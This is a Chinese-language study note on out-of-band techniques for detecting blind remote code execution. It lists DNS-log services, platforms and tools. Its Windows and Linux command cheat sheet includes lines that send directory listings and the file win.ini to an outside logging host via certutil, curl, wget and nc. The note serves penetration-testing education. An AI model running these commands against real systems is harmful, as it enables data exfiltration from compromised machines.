学习笔记-OOB
OOB
免責聲明
本文檔僅供學習和研究使用,請勿使用文中的技術源碼用于非法用途,任何人造成的任何負面影響,與本人無關.
相關文章
- 帶外通道技術(OOB)總結
- OOB(out of band)分析系列之DNS滲漏
- Burpsuite之BurpCollaborator模塊介紹
- Persistent Access to Burp Suite Sessions - Step-by-Step Guide
- Burp Collaborator
- HTTP BLIND
- Cracking the lens: targeting HTTP's hidden attack-surface
- System Hardening? ?? RCE? ???? ?? OOB ???
- ping 命令跨平臺探測無回顯 RCE 技巧
在線監控平臺
- http://ceye.io/
- https://webhook.site
- http://www.dnslog.cn/
- https://iplogger.org/
- https://log.咕.com/
相關工具
- uknowsec/SharpNetCheck - 該工具可以在 dnslog 中回顯內網 ip 地址和計算機名,可實現內網中的快速定位可出網機器
- ztgrace/mole - 識別和利用out-of-band (OOB)漏洞的burp擴展
平臺搭建
- 十分鐘快速自建DNSlog服務器
- DNSLOG的快速搭建攻略
- 安全技術|DNSLOG平臺搭建從0到1
- 自建DNSLog平臺
- 快速搭建自用dnslog
平臺
- BugScanTeam/DNSLog - DNSLog 是一款監控 DNS 解析記錄和 HTTP 訪問記錄的工具
- lanyi1998/DNSlog-GO - DNSLog-GO 是一款 golang 編寫的監控 DNS 解析記錄的工具,自帶 WEB 界面
- chennqqi/godnslogdocker pull "sort/godnslog" docker run -p80:8080 -p53:53/udp "sort/godnslog" serve -domain yourdomain.com -4 100.100.100.100 # yourdomain.com 替換為你的域名 100.100.100.100 替換為你的公網IP
- yumusb/DNSLog-Platform-Golang - DNSLOG平臺 golang 一鍵啟動版
- phith0n/conote-community - Conote 綜合安全測試平臺社區版
- projectdiscovery/interactsh - An OOB interaction gathering server and client library
- Buzz2d0/Hyuga - 一個用來檢測帶外(Out-of-Band)流量(DNS查詢和HTTP請求)的監控工具
- AbelChe/cola_dnslog
- AlphabugX/Alphalog
- Li4n0/revsuit - RevSuit is a flexible and powerful reverse connection platform designed for receiving connection from target host in penetration.
Windows
-
ping
ping %USERNAME%.xxx.ceye.ioping -nc 4 %USERNAME%.xxx.ceye.io -
certutil
使用 certutil 請求證書文件,并將下載文件重定向到 nul,無緩存、無需瀏覽器實現發起 http 請求
for /F %x in ('dir /b c:\') do certutil -urlcache -split -f "http://xxx.ceye.io/?result=%x" nul -
curl
windows 環境默認是支持 curl 的
for /F %x in ('dir /b c:\') do curl http://xxx.ceye.io/%xcurl -F file=@C:\windows\win.ini http://xxx.ceye.io
linux
-
curl
curl http://xxx.ceye.io/%x -
wget
wget http://xxx.ceye.io/%x -
ping
linux 默認 ping 不帶 -c 參數是會導致無限ping下去的,一定要帶 -c
ping -c 4 xxx.ceye.ioping -nc 4 xxx.ceye.io -
openssl
openssl s_client -connect xxx.ceye.io:80 -
nc
echo -e "GET / HTTP/1.1\nHost: http://xxx.ceye.io/%x\n\n" | nc xxx.ceye.io 80 -
dig
dig xxx.ceye.io
點擊關注,共同學習!安全狗的自我修養
github haidragon
https://github.com/haidragon
總結
- 上一篇: leapmotion设备连接Unity3
- 下一篇: Daniel Jeffries:为什么我